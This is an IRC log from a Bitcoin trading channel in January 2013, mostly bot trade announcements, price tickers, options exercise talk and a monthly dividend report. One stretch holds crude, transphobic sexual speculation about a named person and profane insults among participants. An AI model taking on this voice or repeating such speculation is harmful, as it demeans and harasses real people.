Jan 25 21:34:17 and also he fucked up the last bit Jan 25 21:34:25 The only item in that of any great Jan 25 21:34:25 relevance to this pass-through will be the number of S-Dice shares listed as Jan 25 21:34:25 held by LTC-ATF (which will always be at least as large as the number of Jan 25 21:34:25 outstanding units of this security). Jan 25 21:34:33 sanity requires that i down-vote all passthroughs Jan 25 21:34:52 maybe you remember i was reporting here when he started it and worried about covering coinbr fees Jan 25 21:35:00 jurov a yes Jan 25 21:35:06 well... they work on a different schedule in ltc Jan 25 21:35:15 what is it, .3 cents each ? Jan 25 21:35:25 0.0037 atm Jan 25 21:35:30 LTC/USD 0.061796 Jan 25 21:35:30 *BTC Jan 25 21:35:56 a so .4 ok Jan 25 21:35:59 [MPEX] [S.MPOE] 100 @ 0.00063145 = 0.0631 BTC [+] Jan 25 21:35:59 must have gone up Jan 25 21:36:00 [MPEX] [S.MPOE] 6450 @ 0.00063144 = 4.0728 BTC [-] Jan 25 21:36:58 jcpham why ? seems kinda educational Jan 25 21:37:18 i'm being an ass Jan 25 21:37:38 tot vol 2,644 mkt cap 2,537 Jan 25 21:37:40 wtf ?! Jan 25 21:38:02 24h Vol 861@274.9 7d Vol 6144@2094.3 Jan 25 21:38:08 why does this stuff make absolutely no sense Jan 25 21:38:21 bitcoin! Jan 25 21:38:26 o wait Jan 25 21:38:31 litecoin. Jan 25 21:38:39 it's not @ as in at, it's / as in shares/ltcs ? Jan 25 21:39:04 sum shares sum vol? Jan 25 21:39:08 i guess ? Jan 25 21:39:16 ;;calc 274.9 / 861 Jan 25 21:39:16 0.319279907085 Jan 25 21:39:27 ;;calc 2094.3/6144 Jan 25 21:39:27 0.340869140625 Jan 25 21:40:39 i was curious recetly, computed total mkt cap of litecoin in btc Jan 25 21:40:46 any guesses? Jan 25 21:40:57 10k Jan 25 21:41:33 3k Jan 25 21:41:39 Well that was stupid Jan 25 21:42:48 I saw when I woke up price go over the average and exercised. I totally forgot the 19 USD/BTC trades were about to go out of the 24h period. Jan 25 21:43:11 ;;ticker Jan 25 21:43:11 BTCUSD ticker | Best bid: 17.35114, Best ask: 17.35243, Bid-ask spread: 0.00129, Last trade: 17.35113, 24 hour volume: 132205.38784117, 24 hour low: 15.38613, 24 hour high: 17.79700, 24 hour vwap: 16.60856 Jan 25 21:43:22 jurov: ? Jan 25 21:43:42 ;;calc 0.00369*284627*50 Jan 25 21:43:42 52513.6815 Jan 25 21:43:47 ^this Jan 25 21:43:50 52k btc ? srsly ?! Jan 25 21:44:09 i thought it was a new chain Jan 25 21:44:55 I exercised 3 hours ago at 17.01 for 212. Jan 25 21:45:03 a Jan 25 21:45:16 let's see here Jan 25 21:45:25 If I had waited for the high trade to expires and exercised at the low 16.60, would have gotten 262.55421096 BTC instead Jan 25 21:45:43 well... it COULD have spiked up Jan 25 21:46:21 Well yes, but that would have required to outmatch the large trades at ~18.5-19 USD that were about to expire Jan 25 21:46:27 weighting in the 24h average Jan 25 21:46:38 Somewhat unlikely Jan 25 21:46:40 that's a point Jan 25 21:47:02 I haven't slept much... making stupid mistakes. Jan 25 21:47:10 [MPEX] [S.MPOE] 494 @ 0.00063364 = 0.313 BTC [+] Jan 25 21:47:12 Yet I have to watch my trades. A bit annoying. Jan 25 21:47:47 At least I'm more than decently in the green Jan 25 21:47:50 hehe welcome to the life of the daytrader Jan 25 21:58:05 [MPEX] [S.MPOE] 7300 @ 0.0006346 = 4.6326 BTC [+] Jan 25 22:14:08 ;;bc,24hprc Jan 25 22:14:09 16.71 Jan 25 22:18:47 going up... exercise Jan 25 22:18:50 all puts Jan 25 22:19:11 I forgot to wait for the 19 USD trades to expire... but now it's done. Jan 25 22:19:19 Should go up from now on Jan 25 22:19:48 [MPEX] [S.MPOE] 8251 @ 0.00063605 = 5.248 BTC [+] Jan 25 22:19:50 [MPEX] [S.MPOE] 21000 @ 0.00063606 = 13.3573 BTC [+] Jan 25 22:19:51 [MPEX] [S.MPOE] 9097 @ 0.00063759 = 5.8002 BTC [+] Jan 25 22:19:53 [MPEX] [S.MPOE] 5017 @ 0.0006403 = 3.2124 BTC [+] Jan 25 22:19:54 [MPEX] [S.MPOE] 16150 @ 0.00064112 = 10.3541 BTC [+] Jan 25 22:19:55 just exercised them all Jan 25 22:19:55 [MPEX] [S.MPOE] 8280 @ 0.00064174 = 5.3136 BTC [+] Jan 25 22:19:56 [MPEX] [S.MPOE] 7000 @ 0.00064267 = 4.4987 BTC [+] Jan 25 22:19:57 [MPEX] [S.MPOE] 7200 @ 0.0006432 = 4.631 BTC [+] Jan 25 22:19:58 [MPEX] [S.MPOE] 8650 @ 0.00064447 = 5.5747 BTC [+] Jan 25 22:19:58 [MPEX] [S.MPOE] 11879 @ 0.00064523 = 7.6647 BTC [+] Jan 25 22:19:59 [MPEX] [S.MPOE] 5980 @ 0.00064531 = 3.859 BTC [+] Jan 25 22:20:01 [MPEX] [S.MPOE] 4150 @ 0.00064663 = 2.6835 BTC [+] Jan 25 22:20:02 [MPEX] [S.MPOE] 6250 @ 0.0006482 = 4.0513 BTC [+] Jan 25 22:20:03 [MPEX] [S.MPOE] 32693 @ 0.00064857 = 21.2037 BTC [+] Jan 25 22:20:04 [MPEX] [S.MPOE] 7800 @ 0.00065519 = 5.1105 BTC [+] Jan 25 22:20:05 [MPEX] [S.MPOE] 15500 @ 0.00065552 = 10.1606 BTC [+] Jan 25 22:20:06 [MPEX] [S.MPOE] 43993 @ 0.00065576 = 28.8488 BTC [+] Jan 25 22:20:08 [MPEX] [S.MPOE] 41100 @ 0.00065764 = 27.029 BTC [+] Jan 25 22:20:09 [MPEX] [S.MPOE] 21300 @ 0.0006595 = 14.0474 BTC [+] Jan 25 22:20:10 [MPEX] [S.MPOE] 22250 @ 0.0006725 = 14.9631 BTC [+] Jan 25 22:20:10 [MPEX] [S.MPOE] 18525 @ 0.00067525 = 12.509 BTC [+] Jan 25 22:20:11 [MPEX] [S.MPOE] 14400 @ 0.00068233 = 9.8256 BTC [+] Jan 25 22:20:12 [MPEX] [S.MPOE] 39400 @ 0.00068745 = 27.0855 BTC [+] Jan 25 22:22:51 [MPEX] [S.DICE] 500 @ 0.00649884 = 3.2494 BTC [-] Jan 25 22:22:52 [MPEX] [S.DICE] 2990 @ 0.00654141 = 19.5588 BTC [+] Jan 25 22:22:54 [MPEX] [S.DICE] 1610 @ 0.00654142 = 10.5317 BTC [+] Jan 25 22:22:55 [MPEX] [S.DICE] 300 @ 0.00656628 = 1.9699 BTC [+] Jan 25 22:27:05 [MPEX] [S.BBET] 300 @ 0.0010499 = 0.315 BTC [-] Jan 25 22:28:47 http://blockviewer.com/#1Fx3N5iFPDQxUKhhmDJqCMmi3U8Y7gSncx Jan 25 22:30:42 ^^ bane of everyone who listed their btc addy in btctalk profile Jan 25 22:31:19 missed the bottom by 0.1 BTC :( lost 22BTC Jan 25 22:34:21 How much did you make =P Jan 25 22:34:38 [MPEX] [S.MPOE] 2345 @ 0.00064895 = 1.5218 BTC [-] Jan 25 22:34:54 ~100% Jan 25 22:35:01 Nice Jan 25 22:35:17 Pretty much the same as me. Could have made 150% Jan 25 22:36:38 jurov does that graph mean mpex is like a hairy zit ? Jan 25 22:37:04 or an octopus Jan 25 22:37:27 Bugpowder_ update the parabolzi Jan 25 22:38:25 im like, addicted to it lol Jan 25 22:38:30 vicarious trader at work Jan 25 22:38:41 Right now it scrapes Bitcoin-OTC and BitcoinTalk forum signatures to initially seed the labels... oh beware :D Jan 25 22:46:30 ;;bc,24hprc Jan 25 22:46:31 16.72 Jan 25 22:46:39 kinda expecting $14-15 tomorrow Jan 25 22:47:35 [MPEX] [S.MPOE] 16300 @ 0.00069998 = 11.4097 BTC [+] Jan 25 22:50:38 [MPEX] [S.DICE] 300 @ 0.00636682 = 1.91 BTC [-] Jan 25 22:50:40 [MPEX] [S.DICE] 242 @ 0.00636679 = 1.5408 BTC [-] Jan 25 23:01:27 I will update it once the opex happens Jan 25 23:02:43 If I put open orders on the N contracts do they stay open when the N rolls to T? Jan 25 23:03:47 Hi all. Not quite sure I understand the weight on bitbet. Can someone msg me the calc to find how much I COULD win, based on weight. Thx :) Jan 25 23:04:57 kakobrekla, some question for you I guess Jan 25 23:09:00 he vectored into an exponanial function shape and was propulsed into space Jan 25 23:09:53 He's going faster and faster with time passing by and should exceed the speed of light soon. Jan 25 23:10:53 http://finance.yahoo.com/q?s=%5ETNX Jan 25 23:10:59 big move! Jan 25 23:11:25 people moving out of bonds into the market? Jan 25 23:11:51 RonnieS it just works like it generally does with betting. Jan 25 23:11:53 [MPEX] [S.MPOE] 7063 @ 0.00068512 = 4.839 BTC [-] Jan 25 23:12:16 out of a pool of 3 the 1 with full weight wins 2x more than the 1 witgh half weight Jan 25 23:12:34 Bugpowder_ no, orders are killed. Jan 25 23:12:38 ok Jan 25 23:13:43 [MPEX] [S.DICE] 638 @ 0.00635543 = 4.0548 BTC [-] Jan 25 23:14:05 [MPEX] [S.DICE] 20 @ 0.00635543 = 0.1271 BTC [-] Jan 25 23:16:14 [MPEX] [S.MPOE] 6651 @ 0.00068326 = 4.5444 BTC [-] Jan 25 23:17:54 [MPEX] [O.BTCUSD.C170N] 3 @ 0.14496282 = 0.4349 BTC [-] Jan 25 23:19:44 [MPEX] [O.BTCUSD.C160N] 6 @ 0.16945017 = 1.0167 BTC [-] Jan 25 23:21:00 [MPEX] [O.BTCUSD.P160N] 3 @ 0.13518966 = 0.4056 BTC [-] Jan 25 23:21:22 [MPEX] [O.BTCUSD.P170N] 3 @ 0.16277102 = 0.4883 BTC [-] Jan 25 23:22:32 thx, get it Jan 25 23:49:00 [BTCTC] [BTC-BOND] 25 @ 0.01 = 0.25 BTC [+] Jan 25 23:51:46 [BTCTC] [BTC-TRADING-PT] 5 @ 0.13 = 0.65 BTC [+] Jan 25 23:55:27 [BTCTC] [B.YABMC] 100 @ 0.0202 = 2.02 BTC [+] Jan 25 23:55:29 [BTCTC] [B.YABMC] 100 @ 0.0201 = 2.01 BTC [-] Jan 25 23:55:29 [BTCTC] [B.YABMC] 40 @ 0.02 = 0.8 BTC [-] Jan 26 00:00:20 [BTCTC] [RSM] 100 @ 0.0087 = 0.87 BTC [+] Jan 26 00:02:17 [MPEX] [S.MPOE] 2655 @ 0.00068326 = 1.8141 BTC [-] Jan 26 00:02:19 [MPEX] [S.MPOE] 8195 @ 0.00067873 = 5.5622 BTC [-] Jan 26 00:04:29 [BTCTC] [RSM] 100 @ 0.0088 = 0.88 BTC [+] Jan 26 00:05:42 [MPEX] [S.MPOE] 130 @ 0.00067873 = 0.0882 BTC [-] Jan 26 00:05:44 [MPEX] [S.MPOE] 524 @ 0.00067125 = 0.3517 BTC [-] Jan 26 00:05:45 [MPEX] [S.MPOE] 6303 @ 0.00066887 = 4.2159 BTC [-] Jan 26 00:05:46 All of the S.DICE whales have a similar visualizer chart Jan 26 00:05:48 http://blockviewer.com/#1Di6ux3CQBNXCZLD76BsnYWDo6XnFGzQah Jan 26 00:06:06 [HAVELOCK] [SDICE] 10 @ 0.595 = 5.95 BTC [+] Jan 26 00:06:15 Is the drake dog;leominer address a mixing service? Jan 26 00:07:05 [HAVELOCK] [SDICE] 10 @ 0.599 = 5.99 BTC [+] Jan 26 00:08:06 [HAVELOCK] [SDICE] 7 @ 0.62 = 4.34 BTC [+] Jan 26 00:09:16 [BTCTC] [RSM] 100 @ 0.0089 = 0.89 BTC [+] Jan 26 00:12:11 ;;bc,24hprc Jan 26 00:12:12 16.68 Jan 26 00:12:18 damnit! it went lower? Jan 26 00:13:38 [BTCTC] [BTC-BOND] 29 @ 0.01 = 0.29 BTC [+] Jan 26 00:18:55 [BTCTC] [RSM] 150 @ 0.009 = 1.35 BTC [+] Jan 26 00:22:46 ;;ticker Jan 26 00:22:46 BTCUSD ticker | Best bid: 17.33512, Best ask: 17.47562, Bid-ask spread: 0.14050, Last trade: 17.33310, 24 hour volume: 86322.83896858, 24 hour low: 15.38613, 24 hour high: 17.79700, 24 hour vwap: 16.67646 Jan 26 00:25:49 ;;ticker Jan 26 00:25:49 BTCUSD ticker | Best bid: 17.35330, Best ask: 17.49695, Bid-ask spread: 0.14365, Last trade: 17.34522, 24 hour volume: 85549.80223109, 24 hour low: 15.38613, 24 hour high: 17.79700, 24 hour vwap: 16.67057 Jan 26 00:35:06 [MPEX] [S.MPOE] 1644 @ 0.00068512 = 1.1263 BTC [+] Jan 26 00:41:16 [MPEX] [S.DICE] 675 @ 0.00634 = 4.2795 BTC [-] Jan 26 00:41:18 [MPEX] [S.DICE] 75 @ 0.00631463 = 0.4736 BTC [-] Jan 26 00:41:58 [BTCTC] [BTC-BOND] 22 @ 0.01 = 0.22 BTC [+] Jan 26 00:47:08 sounds like agood idea except i doubt he'd have you as a guest EskimoBob_afk Jan 26 00:47:16 just a guess Jan 26 00:49:00 it isn't wise to judge a culture you know anything about Jan 26 00:49:07 i know nothing of romanian culture Jan 26 00:49:29 although iirc mp is more international than romanian Jan 26 00:49:45 i actually didn't imply that you knew nothing Jan 26 00:49:55 bring it Jan 26 00:50:17 facepalm Jan 26 00:50:41 make sure to get a full body shot of mpoe-pr if you go Jan 26 00:50:44 forsure Jan 26 00:50:53 i dunno why we need more pic of mp Jan 26 00:51:00 theres more than enough online Jan 26 00:51:11 i think mpoe-pr might be transexual Jan 26 00:51:26 make sure to get an angle under the chin Jan 26 00:51:47 transsexual which direction ? Jan 26 00:51:55 boobs plus weiner Jan 26 00:52:06 ya but Jan 26 00:52:26 butt too. Jan 26 00:52:29 lol Jan 26 00:52:38 actually if she had a dick i doubt it'd be a wiener Jan 26 00:52:50 huge blck cock Jan 26 00:52:51 more like the stuff nightmares are made of Jan 26 00:53:07 i figured a full body shot would expose the bulge Jan 26 00:55:09 kakobrekla i guess pics of me are like pics of asics Jan 26 00:55:14 people need them to jack themselves off to sleep Jan 26 00:56:02 jesus fuck all that sexy ladies jack off to to sleep is you?!? Jan 26 00:56:20 just the transsexual ones Jan 26 00:56:35 ah, sheesh. makes sense. Jan 26 00:56:53 but you have so many more options with a transexual Jan 26 00:56:55 ! Jan 26 00:57:01 EskimoBob_afk are you in love? Jan 26 00:57:04 nice beard. Jan 26 00:57:24 jcpham from what i understand, the problem chiefly is that so do they. Jan 26 00:57:35 make sense Jan 26 00:57:55 i dont see anything 'lunatic' on that pic Jan 26 00:57:56 EskimoBob_afk i sound like a lunatic irl Jan 26 00:58:06 natty threads Jan 26 00:58:26 i try to on the internet too Jan 26 00:58:35 sometimes it doesn't translate well... Jan 26 00:58:50 EskimoBob_afk, not really, i think 'love' is a bag of horse shit but thats beside the point. Jan 26 00:59:57 bitch came back. Jan 26 01:00:31 yes i have over 9000 tonnes and only vagina i ever saw was my mothers when i was born Jan 26 01:00:34 :) Jan 26 01:00:50 kakobreklas are born blind Jan 26 01:01:12 lulz Jan 26 01:02:02 you the expert. Jan 26 01:02:22 you should learn more then. Jan 26 01:02:35 cause you are off? :) Jan 26 01:02:58 and you blow. Jan 26 01:03:04 we all happy. Jan 26 01:03:30 ty. Jan 26 01:03:39 it's rosy red-pal and her 5 sisters. sheesh Jan 26 01:03:47 *red-palm Jan 26 01:03:48 [MPEX] [S.MPOE] 4036 @ 0.0006875 = 2.7748 BTC [+] Jan 26 01:03:49 [BTCTC] [BTC-BOND] 10 @ 0.01 = 0.1 BTC [+] Jan 26 01:04:20 [BTCTC] [MININGCO.ETF] 6 @ 0.54 = 3.24 BTC [+] Jan 26 01:04:45 yes, sry, 'cheeks' Jan 26 01:05:01 hey you came hugging, perv. Jan 26 01:05:05 ;) Jan 26 01:05:41 like a fuckin bitch, ya know Jan 26 01:05:44 i just follow along. Jan 26 01:06:55 i feel great all along. Jan 26 01:08:21 http://trilema.com/2013/all-about-eve/ << great movie btw. Jan 26 01:09:46 ;;bc,24hprc Jan 26 01:09:47 16.68 Jan 26 01:10:06 jcpham: can you set a ban on JWU42`*!*@* in bitcoin-otc Jan 26 01:10:09 https://bitcointalk.org/index.php?topic=138769.msg1479116#msg1479116 they're having fun Jan 26 01:10:37 third or fourth time soeone has been playing games with my handle and trying to scam folks Jan 26 01:11:17 it's done. not sure if one of the other ops will remove it or not Jan 26 01:11:35 i'm sort of just flying blind Jan 26 01:12:37 and why is that? Jan 26 01:12:48 yeah EskimoBob_not_so come over to #bitcoin-otc so i can kick you Jan 26 01:12:53 just one time Jan 26 01:12:57 it won't hurt i promise Jan 26 01:12:59 or better yet - why do you think I haven't Jan 26 01:13:25 JWU42 wouldn't it be easier to just reg it ? Jan 26 01:13:32 yes Jan 26 01:13:37 well Jan 26 01:13:38 no Jan 26 01:13:43 o ic :p Jan 26 01:13:43 easier to ban that nick Jan 26 01:13:50 it's not his nick Jan 26 01:13:56 it's someone squatting Jan 26 01:13:57 i hadbn't noticed the accent Jan 26 01:13:58 EskimoBob_not_so: learn to read you shithead Jan 26 01:14:03 you could reg the ` Jan 26 01:14:05 then they' Jan 26 01:14:14 or /nickserv group it Jan 26 01:14:15 [MPEX] [S.MPOE] 6626 @ 0.0006875 = 4.5554 BTC [+] Jan 26 01:14:19 they are using JWU42` Jan 26 01:14:21 but then they'll just use another char Jan 26 01:14:30 jcpham: yep - probably so Jan 26 01:14:55 jee whiz, i wonder how many people pretended to be me in -otc so far Jan 26 01:14:57 EskimoBob_not_so it's a coomon scam in -otc Jan 26 01:15:03 it fools noobs pretty well Jan 26 01:17:16 same question goes to you EskimoBob_not_so Jan 26 01:18:59 no its not about the hug. Jan 26 01:19:08 its about your dicking around here :) Jan 26 01:19:38 dunno if i have those Jan 26 01:19:44 i heard i have a rock Jan 26 01:20:09 it's not about feelings... he has to wipe stuff after you again Jan 26 01:20:15 maybe instead of brains too :o Jan 26 01:21:27 you provoke crap out of me Jan 26 01:21:35 its what you are good at and i guess for. Jan 26 01:21:54 kakobrekla, please lay down on the couch and feel comfortably Jan 26 01:22:51 me too? Jan 26 01:23:03 what i i did you? Jan 26 01:24:23 lol Jan 26 01:24:27 is there anyone who is not an idiot ? Jan 26 01:24:55 excluding you? Jan 26 01:24:59 come get popcon! Jan 26 01:25:37 any of these most are present here? Jan 26 01:26:48 pls point me to the funny line of yours? i don't see any Jan 26 01:26:57 so nobody is a non-idiot here according to you? Jan 26 01:27:25 [MPEX] [S.MPOE] 1450 @ 0.00068533 = 0.9937 BTC [-] Jan 26 01:27:46 kako, calm down.... let's wait till he comes to romania and sells himself to slavery for some btc Jan 26 01:28:12 im calm Jan 26 01:28:26 i just wanna know why he eskimo like the company of idiots Jan 26 01:29:00 oh, maybe you mean these voices of his? Jan 26 01:29:25 where did he go now Jan 26 01:29:35 i have a new bed to asseble, bbl Jan 26 01:32:50 you did not respond.. why do you enjoy associating with idiots like us? Jan 26 01:33:35 ;;ticker Jan 26 01:33:36 BTCUSD ticker | Best bid: 17.33266, Best ask: 17.45000, Bid-ask spread: 0.11734, Last trade: 17.33266, 24 hour volume: 80695.71849538, 24 hour low: 15.38613, 24 hour high: 17.79700, 24 hour vwap: 16.65655 Jan 26 01:34:01 ;;calc 8206621.2305 / 17 Jan 26 01:34:01 482742.425324 Jan 26 01:34:21 !ticker Jan 26 01:34:21 I haven't understood a single word you've said since I met you, not one single word. Jan 26 01:34:29 ;;ticker Jan 26 01:34:30 BTCUSD ticker | Best bid: 17.33271, Best ask: 17.44999, Bid-ask spread: 0.11728, Last trade: 17.33266, 24 hour volume: 80695.71849538, 24 hour low: 15.38613, 24 hour high: 17.79700, 24 hour vwap: 16.65655 Jan 26 01:34:38 ;;bids 17.33271 Jan 26 01:34:39 There are currently 0.99202 bitcoins demanded at or over 17.33271 USD, worth 17.2610301936 USD in total. Jan 26 01:34:44 Nuff said. I haven't understood a single word you've said since I met you, not one single word. Jan 26 01:34:48 ;;bids 17 Jan 26 01:34:49 There are currently 2575.4113 bitcoins demanded at or over 17.0 USD, worth 44124.7036667 USD in total. Jan 26 01:34:56 ;;bids 0 Jan 26 01:34:57 There are currently 35308190 bitcoins demanded at or over 0.0 USD, worth 2549019.46181 USD in total. Jan 26 01:35:09 ;;asks 0 Jan 26 01:35:10 There are currently 0 bitcoins offered at or under 0.0 USD, worth 0.0 USD in total. Jan 26 01:35:16 er Jan 26 01:35:19 ;;asks 9999999999999 Jan 26 01:35:20 There are currently 93675.646 bitcoins offered at or under 1e+13 USD, worth 2.8030813218e+12 USD in total. Jan 26 01:35:29 I broke it Jan 26 01:35:33 pretty meaningless stat. Jan 26 01:35:49 when is opex gonna happen? Jan 26 01:36:34 apex? Jan 26 01:37:09 opex Jan 26 01:39:53 bout half hour Jan 26 01:42:01 [MPEX] [S.MPOE] 10088 @ 0.0006875 = 6.9355 BTC [+] Jan 26 01:42:02 [MPEX] [S.MPOE] 2762 @ 0.00068768 = 1.8994 BTC [+] Jan 26 01:45:54 [MPEX] [S.MPOE] 2383 @ 0.00068768 = 1.6387 BTC [+] Jan 26 01:45:56 [MPEX] [S.MPOE] 3601 @ 0.000688 = 2.4775 BTC [+] Jan 26 02:03:40 so, what is teh mpbor? Jan 26 02:14:58 announcement momentarily Jan 26 02:16:45 last minute tips? Jan 26 02:16:54 119%? Jan 26 02:17:44 is there an advantage of buying puts or calls now rather than later? Jan 26 02:17:44 [BTCTC] [BASIC-MINING] 10 @ 0.34 = 3.4 BTC [+] Jan 26 02:18:20 none other than price Jan 26 02:18:52 so, you had these puts on coinbr? sadly, they expired worthless Jan 26 02:19:19 [BTCTC] [BTC-BOND] 500 @ 0.01 = 5 BTC [+] Jan 26 02:19:31 breaks of the game Jan 26 02:21:30 you could have bought next month ones (if they were available) Jan 26 02:22:36 i got some C200Ns... were more expensive and need btcusd to go 25 but i a month, it may happen Jan 26 02:23:27 I bought the puts mid last month Jan 26 02:25:13 http://trilema.com/2013/mpoe-january-2013-statement/ Jan 26 02:25:18 provisional report. Jan 26 02:25:35 from now on i'm going to publish early sat, corrections etc if need be, make payments next day. Jan 26 02:26:24 so , provisional mpbor 9.99% ftw Jan 26 02:26:56 a that ain't changing Jan 26 02:27:13 in fact im pretty sure everyhing's right as it is. Jan 26 02:31:26 4500 BTC for you this month Jan 26 02:31:36 Congratulations Jan 26 02:31:40 i missed it Jan 26 02:31:47 Nice dividend Jan 26 02:31:55 financials posted? Jan 26 02:32:06 yeah Jan 26 02:32:12 [19:25] http://trilema.com/2013/mpoe-january-2013-statement/ Jan 26 02:32:20 one minute before you joined Jan 26 02:33:05 Namworld depends how you count it. Jan 26 02:33:10 wow Jan 26 02:33:12 im getting like 4k in interest and like 4k in dividends. Jan 26 02:33:15 the bot made 10k Jan 26 02:33:18 yeh. Jan 26 02:33:25 yup Jan 26 02:34:05 its really fascinating : s.mpoe and s.dice were priced equal by the mkt this month Jan 26 02:34:11 and unexpectedly they're making about the same. Jan 26 02:34:58 (the 6k that doesn't go to shareholders in mpoe's case as cash is in fact going to them as security : unlike s.dice, s.mpoe can't make a loss) Jan 26 02:37:46 [MPEX] [S.MPOE] 8800 @ 0.00065865 = 5.7961 BTC [-] Jan 26 02:39:30 [MPEX] [S.MPOE] 9800 @ 0.0006552 = 6.421 BTC [-] Jan 26 02:39:32 [MPEX] [S.MPOE] 200 @ 0.00065274 = 0.1305 BTC [-] Jan 26 02:40:28 [MPEX] [S.MPOE] 28617 @ 0.00065865 = 18.8486 BTC [+] Jan 26 02:40:30 [MPEX] [S.MPOE] 1601 @ 0.00065965 = 1.0561 BTC [+] Jan 26 02:40:31 [MPEX] [S.MPOE] 22300 @ 0.00066435 = 14.815 BTC [+] Jan 26 02:40:33 [MPEX] [S.MPOE] 17233 @ 0.00067412 = 11.6171 BTC [+] Jan 26 02:40:34 [MPEX] [S.MPOE] 7652 @ 0.00067851 = 5.192 BTC [+] Jan 26 02:40:35 [MPEX] [S.MPOE] 90543 @ 0.00068325 = 61.8635 BTC [+] Jan 26 02:40:36 [MPEX] [S.MPOE] 2301 @ 0.000688 = 1.5831 BTC [+] Jan 26 02:40:38 [MPEX] [S.MPOE] 4300 @ 0.00068847 = 2.9604 BTC [+] Jan 26 02:40:39 [MPEX] [S.MPOE] 13453 @ 0.00069125 = 9.2994 BTC [+] Jan 26 02:45:12 http://imgur.com/pIGyAu3 Jan 26 02:45:14 update Jan 26 02:45:44 not a bad month Jan 26 02:45:51 ;;ticker Jan 26 02:45:52 BTCUSD ticker | Best bid: 17.15003, Best ask: 17.20000, Bid-ask spread: 0.04997, Last trade: 17.15003, 24 hour volume: 79377.81011270, 24 hour low: 15.38613, 24 hour high: 17.79700, 24 hour vwap: 16.67744 Jan 26 02:46:02 still a ponzi Jan 26 02:46:50 what i don't understand is : were you underwater till dec ? Jan 26 02:46:56 glbse Jan 26 02:46:58 yes Jan 26 02:47:08 heh o i c. Jan 26 02:47:08 and f.giga exit Jan 26 02:47:22 well props for sticking to it. Jan 26 02:47:37 is the rougher line left an indication of less trading activity ? Jan 26 02:47:46 no, depression Jan 26 02:47:51 lol Jan 26 02:47:54 you mean, psychological ? Jan 26 02:48:10 why update unless its up??? Jan 26 02:48:17 ahahaha Jan 26 02:48:23 trader needs nerves of steel you know Jan 26 02:49:12 kinda love the dollar divergence tbh. Jan 26 02:49:21 a lot easier making money without HFT and hegies trying to rape you Jan 26 02:49:45 if EskimoBob is my trading competition, I'm feeling good Jan 26 02:49:51 [MPEX] [S.MPOE] 6300 @ 0.00067994 = 4.2836 BTC [-] Jan 26 02:49:54 i don't think he trades. Jan 26 02:52:17 ok substitue with Joe Bitcoin Jan 26 02:52:54 hey my name is Joe Bitcoin! Jan 26 02:53:12 [MPEX] [S.MPOE] 9522 @ 0.00069125 = 6.5821 BTC [+] Jan 26 02:53:14 [MPEX] [S.MPOE] 2450 @ 0.00069228 = 1.6961 BTC [+] Jan 26 02:53:15 [MPEX] [S.MPOE] 8793 @ 0.0006925 = 6.0892 BTC [+] Jan 26 02:55:38 i am actually already preparing for that sweet moment when joe wallstreet discovers btc for reals Jan 26 02:55:52 and then discovers that a) mpex already owns it and b) it doesn't really allow hft Jan 26 02:56:08 the qty of butthurt shall put two year's worth of btctalk.org to shame Jan 26 02:56:29 lol Jan 26 02:56:44 onoes! but how can this be! but why! o noes! unfair! Jan 26 02:57:29 i'll bet you dollars to rials that 99.x% of all the currently active smartasses can't actually trade with their own head. Jan 26 02:57:48 sure, as long as they're using the computer and _EVERYONE ELSE ALSO IS_ it "works". Jan 26 02:57:58 but god it will be a riot when it's back to pen and paper. Jan 26 02:58:23 and there's no washington to go whine to Jan 26 02:58:25 ahhh Jan 26 02:59:28 [BTCTC] [GSDPT] 11 @ 0.0067 = 0.0737 BTC [+] Jan 26 03:00:48 twas very nice start for MPBPT :) Jan 26 03:01:43 cool :D Jan 26 03:05:39 [BTCTC] [BTC-BOND] 2 @ 0.01 = 0.02 BTC [+] Jan 26 03:23:02 lol actually mpex *can* be traded with computer. they just have to rethink the strategies Jan 26 03:23:55 maybe. Jan 26 03:24:05 it will be a truely pitched battle. technical, prolly legal too. Jan 26 03:24:21 we see who emerges and in what shape. Jan 26 03:27:51 perhaps you'll have to move to some jurisdiction without that fiduciary responsibility hassle Jan 26 03:28:31 build some space station, maybe? Jan 26 03:28:53 i'll be fine right here. Jan 26 03:29:11 hm is ass bot dead ? Jan 26 03:29:32 !ticker m s.mpoe Jan 26 03:29:34 [MPEX:S.MPOE] 1D: 0.00061382 / 0.00065565 / 0.0007 (1481411 shares, 971.29 BTC), 7D: 0.00059445 / 0.00065129 / 0.0007 (23480449 shares, 15,292.65 BTC), 30D: 0.00059445 / 0.00065074 / 0.0007 (52359799 shares, 34,073.00 BTC) Jan 26 03:29:43 kakobrekla ^ it's not reporting trades tho Jan 26 03:31:22 [MPEX] [S.DICE] 900 @ 0.00661654 = 5.9549 BTC [+] Jan 26 03:31:34 !cookie Jan 26 03:32:16 !amuse me Jan 26 03:32:29 !sex on the bitch Jan 26 03:32:53 !ticker cookie Jan 26 03:32:53 Have you got any tobacco? Jan 26 03:33:35 [MPEX] [S.MPOE] 5 @ 0.0007 = 0.0035 BTC [+] Jan 26 03:35:42 [MPEX] [S.MPOE] 23400 @ 0.0007 = 16.38 BTC [+] Jan 26 03:39:49 yup Jan 26 03:39:54 I knew it Jan 26 03:40:10 that's why I exercised early and bot 500k of S.MPOE Jan 26 03:43:30 [MPEX] [S.MPOE] 14000 @ 0.00069235 = 9.6929 BTC [-] Jan 26 03:47:06 [MPEX] [S.MPOE] 4750 @ 0.00068719 = 3.2642 BTC [-] Jan 26 03:47:08 [MPEX] [S.MPOE] 12502 @ 0.0007 = 8.7514 BTC [+] Jan 26 03:48:21 [MPEX] [S.MPOE] 17300 @ 0.0007 = 12.11 BTC [+] Jan 26 03:49:59 \\ Jan 26 03:50:02 oops Jan 26 03:50:54 ls Jan 26 03:57:15 [MPEX] [S.MPOE] 4800 @ 0.0007 = 3.36 BTC [+] Jan 26 03:57:57 The next great 10% trade for me is coming soon Jan 26 03:58:06 9 million shares left Jan 26 03:58:23 well ok. im done for the day Jan 26 03:58:25 see you all tomorro **** BEGIN LOGGING AT Sat Jan 26 10:50:36 2013 Jan 26 10:54:49 [MPEX] [S.MPOE] 6950 @ 0.00068952 = 4.7922 BTC [+] Jan 26 10:54:51 [MPEX] [S.MPOE] 8468 @ 0.00069197 = 5.8596 BTC [+] Jan 26 10:54:52 [MPEX] [S.MPOE] 71 @ 0.00069409 = 0.0493 BTC [+] Jan 26 10:54:53 [MPEX] [S.MPOE] 3561 @ 0.00069732 = 2.4832 BTC [+] Jan 26 11:07:41 [MPEX] [S.DICE] 2150 @ 0.00643878 = 13.8434 BTC [-] Jan 26 11:12:30 [MPEX] [S.MPOE] 5250 @ 0.00069642 = 3.6562 BTC [-] Jan 26 11:13:38 [MPEX] [S.MPOE] 18560 @ 0.00069642 = 